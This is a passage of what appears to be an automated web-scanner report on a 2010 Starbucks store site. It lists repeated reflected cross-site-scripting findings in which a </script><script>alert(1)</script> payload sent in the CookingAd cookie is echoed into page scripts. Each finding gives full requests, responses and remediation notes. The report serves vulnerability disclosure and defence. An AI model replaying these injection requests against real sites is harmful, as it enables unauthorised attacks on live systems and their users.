<!--S1--><!--S0-->
<html> <head> <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name= ...[SNIP]... Name="Search Listing:" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="/products/shprodli.asp" var s_prop3="SBPTPAHP1SHTBD6B5C</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>9153ADAAF8C" var s_prop4="" var s_prop5="" var s_prop6="/products/shprodli.asp" var s_prop7="" var s_prop8="" var s_prop9="Search Listing: Internal: " var s_prop10="" /* E-commerce Variables */
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3a282</script><script>alert(1)</script>e390fba785c was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /products/shabotus.asp HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB3a282</script><script>alert(1)</script>e390fba785c;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 14484 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:41:38 GMT Connection: close
<!--S1--><!--S0-->
<html> <head> <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name= ...[SNIP]... products/shabotus.asp" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="/products/shabotus.asp" var s_prop3="SBPTPAHP1SHTB3A282</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>E390FBA785C" var s_prop4="" var s_prop5="" var s_prop6="/products/shabotus.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaign="" var s_ ...[SNIP]...
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d15c0</script><script>alert(1)</script>f0bd362f13 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /products/shourplg.asp HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTBd15c0</script><script>alert(1)</script>f0bd362f13;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 25377 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:43:10 GMT Connection: close
<!--S1--><!--S0-->
<html> <head> <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name= ...[SNIP]... products/shourplg.asp" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="/products/shourplg.asp" var s_prop3="SBPTPAHP1SHTBD15C0</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>F0BD362F13" var s_prop4="" var s_prop5="" var s_prop6="/products/shourplg.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaign="" var s_ ...[SNIP]...
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fa301</script><script>alert(1)</script>0485f7d85aa was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /products/shprodde.asp HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTBfa301</script><script>alert(1)</script>0485f7d85aa;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 21224 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:41:31 GMT Connection: close
<!--S1--><!--S0--> <link href="/include/sitenew.css" type="text/css" rel="StyleSheet"> <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name="description" content="F ...[SNIP]... ines. */ var s_pageName="HomePage" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="HomePage" var s_prop3="SBPTPAHP1SHTBFA301</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>0485F7D85AA" var s_prop4="" var s_prop5="" var s_prop6="/default.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaign="" var s_state=""
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 109e9</script><script>alert(1)</script>b870a4bcca was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /products/shprodde.asp?SKU=309195 HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB109e9</script><script>alert(1)</script>b870a4bcca;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 11887 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:42:26 GMT Connection: close
<!--S1--><!--S0--> <html> <head> <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name="d ...[SNIP]... ageName="Detail Page" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="Detail Page : 309195 : " var s_prop3="SBPTPAHP1SHTB109E9</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>B870A4BCCA" var s_prop4="" var s_prop5="309195 : " var s_prop6="/products/shprodde.asp?SKU=309195" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_ ...[SNIP]...
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9727f</script><script>alert(1)</script>9636677bff4 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /products/shprodli.asp HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB9727f</script><script>alert(1)</script>9636677bff4;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 14427 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:39:00 GMT Connection: close
<!--S1--><!--S0-->
<html> <head> <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name= ...[SNIP]... Name="Search Listing:" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="/products/shprodli.asp" var s_prop3="SBPTPAHP1SHTB9727F</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>9636677BFF4" var s_prop4="" var s_prop5="" var s_prop6="/products/shprodli.asp" var s_prop7="" var s_prop8="" var s_prop9="Search Listing: Internal: " var s_prop10="" /* E-commerce Variables */
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 798a2</script><script>alert(1)</script>711801d72b9 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /products/sitemap.asp HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB798a2</script><script>alert(1)</script>711801d72b9;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 21157 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:43:26 GMT Connection: close
<!--S1--><!--S0-->
<html> <head> <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name= ...[SNIP]... "/products/sitemap.asp" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="/products/sitemap.asp" var s_prop3="SBPTPAHP1SHTB798A2</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>711801D72B9" var s_prop4="" var s_prop5="" var s_prop6="/products/sitemap.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaign="" var s_s ...[SNIP]...
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2d241</script><script>alert(1)</script>487db803af4 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /products/terms.asp HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB2d241</script><script>alert(1)</script>487db803af4;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 15962 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:42:01 GMT Connection: close
<!--S1--><!--S0-->
<html> <head> <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name= ...[SNIP]... ame="/products/terms.asp" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="/products/terms.asp" var s_prop3="SBPTPAHP1SHTB2D241</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>487DB803AF4" var s_prop4="" var s_prop5="" var s_prop6="/products/terms.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaign="" var s_sta ...[SNIP]...
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fae82</script><script>alert(1)</script>675c202d2cd was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /small-office-coffee HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTBfae82</script><script>alert(1)</script>675c202d2cd;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 20742 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:38:15 GMT Connection: close
<html> <head> <link REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <meta HTTP-EQUIV="Cont ...[SNIP]... ice HomePage" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="Starbucks Small Office HomePage" var s_prop3="SBPTPAHP1SHTBFAE82</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>675C202D2CD" var s_prop4="" var s_prop5="" var s_prop6="/small-office-coffee/default.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaign=" ...[SNIP]...
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b3e71</script><script>alert(1)</script>14d1501ca39 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /starbucks-coffee-delivery HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTBb3e71</script><script>alert(1)</script>14d1501ca39;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 19580 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:38:16 GMT Connection: close
<meta HTTP-EQUIV="Conten ...[SNIP]... at Home HomePage" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="Starbucks at Home HomePage" var s_prop3="SBPTPAHP1SHTBB3E71</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>14D1501CA39" var s_prop4="" var s_prop5="" var s_prop6="/starbucks-coffee-delivery/default.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_camp ...[SNIP]...
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bfd3e</script><script>alert(1)</script>0ff078f663a was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /starbucks-coffee-delivery/ HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTBbfd3e</script><script>alert(1)</script>0ff078f663a;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 19580 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:45:04 GMT Connection: close
<meta HTTP-EQUIV="Conten ...[SNIP]... at Home HomePage" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="Starbucks at Home HomePage" var s_prop3="SBPTPAHP1SHTBBFD3E</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>0FF078F663A" var s_prop4="" var s_prop5="" var s_prop6="/starbucks-coffee-delivery/default.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_camp ...[SNIP]...
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1d9d8</script><script>alert(1)</script>b1e2ceb23fc was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /starbucks-coffee-tours/ HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB1d9d8</script><script>alert(1)</script>b1e2ceb23fc;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 16822 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:38:32 GMT Connection: close
<!--S1--><!--S0--> <html> <head> <link REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta NAME=" ...[SNIP]... e="Starbucks Tours Page" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="Starbucks Tours Page" var s_prop3="SBPTPAHP1SHTB1D9D8</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>B1E2CEB23FC" var s_prop4="" var s_prop5="" var s_prop6="/starbucks-coffee-tours/default.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaig ...[SNIP]...
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2f0a0</script><script>alert(1)</script>ba0159ff903 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /starbucks-gift-cards HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB2f0a0</script><script>alert(1)</script>ba0159ff903;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 19751 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:38:19 GMT Connection: close
<!--S1--><!--S0-->
<html> <head> <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name= ...[SNIP]... rbucks Card HomePage" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="Starbucks Card HomePage" var s_prop3="SBPTPAHP1SHTB2F0A0</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>BA0159FF903" var s_prop4="" var s_prop5="" var s_prop6="/starbucks-gift-cards/default.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaign= ...[SNIP]...
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f9ad5</script><script>alert(1)</script>a10c039ee07 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
